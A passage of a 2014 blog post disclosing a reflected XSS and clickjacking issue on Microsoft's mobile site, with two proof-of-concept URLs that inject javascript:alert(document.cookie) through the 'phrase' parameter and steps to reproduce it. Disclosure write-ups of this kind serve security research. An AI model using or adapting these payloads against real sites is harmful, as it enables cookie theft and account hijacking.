Skip to main content

Posts

Showing posts from February, 2014

xss in Microsoft mobile domain

Cookies xss in Microsoft mobile domain also it have xframe open vulnerability for click jacking Domain: m.microsoft.com Poc url steps for reproduce issue are same in both url so I am send both url and steps by using one of them Poc urls : 1.          http://m.microsoft.com/showcase/en/US/Search.mspx?a=results&mid=3900&phrase=%5burl%3djavascript:alert(document.cookie)%5dClick%20here%20to%20see%20Result%5b/url%5d&Search = 2.        http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result[/url ] Vulnerable parameter: phrase= Steps for reproduce issue Poc url http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result[/url ] when users use url .That give a result in Microsoft site like